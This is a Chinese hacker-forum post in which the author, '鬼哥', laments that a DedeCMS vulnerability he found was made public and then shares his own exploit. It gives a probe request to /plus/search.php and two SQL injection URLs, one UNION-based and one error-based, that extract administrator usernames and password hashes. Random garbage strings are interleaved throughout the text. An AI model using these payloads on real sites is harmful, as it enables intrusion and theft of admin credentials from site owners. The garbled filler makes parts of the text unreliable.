转载不加作者名的没JJ
$ S$ m3 [* Y# Z6 X) j# M# H9 k4 k7 b7 y' p
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。! q6 w" n* f$ Z+ I4 o# M$ S( z9 W
" @( x% j3 a' n7 t! D6 S9 Y$ t既然已经发出来了,我就把我自己搞的exp发下吧。。唉。 Q4 o$ {* w4 c' X
7 ?1 \3 _4 A" J) T, K
我一般是这样测试的:
" d k6 p% S( b) `# ^2 F) y. m C6 ^2 f' E# h/ R9 x
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
/ I$ r- P0 u' s: o( l1 b. p3 V( y
1 Q. [; p2 ?( R4 j3 u" s4 b5 n转载不加作者名的没JJ/ x! S6 A) z: }% P4 L' u
5 C* c9 h- a/ g: l
作者:鬼哥
8 n& z3 T4 C* R d$ e @/ }
0 |9 S! M: K1 l) h0 E' \ ; A+ u! s% i" r I3 P( \! u
u T2 Y" [7 A( Y- k. l* `看结果如果提示
7 Z: A! D; {0 V* ], z
3 J5 A8 |3 z* P7 J0 @: VSafe Alert: Request Error step 2 !
; k6 F( }8 J' u+ R9 H3 M* {# w7 k- ]* M, C+ u) F
那么直接用下面的exp
8 s- Y/ K! h* z+ `# {
$ y) `7 i4 f) `- c3 D, L. Dxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
! }0 | \0 j+ ^0 z" ]( ^5 a
$ O* W4 E. p, M6 y0 I& K& _, S
0 ~1 u; z$ T3 L- c9 @6 U1 L% F看结果如果提示
+ a3 G$ w% N( g T# z+ z- Q) j
: V' a. ^, v# e# n* ?Safe Alert: Request Error step 1 !3 x' g+ l2 |6 o; z
: k8 O( x+ t! y1 R7 n那么直接用下面的exp5 A" e3 L3 N8 g% u- g2 R
5 U, y, s, M5 |# `% h3 q+ S
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
0 r+ N% f3 W- ]2 @5 B
3 l( |$ V( P! A1 S* {4 a) \& L5 e- _ Y( [
如果正常显示证明漏洞不存在了。
' E$ \" ~# x, W* Z$ g5 p$ U$ @1 a/ u! z/ C4 G3 C+ B
转载不加作者名的没JJ |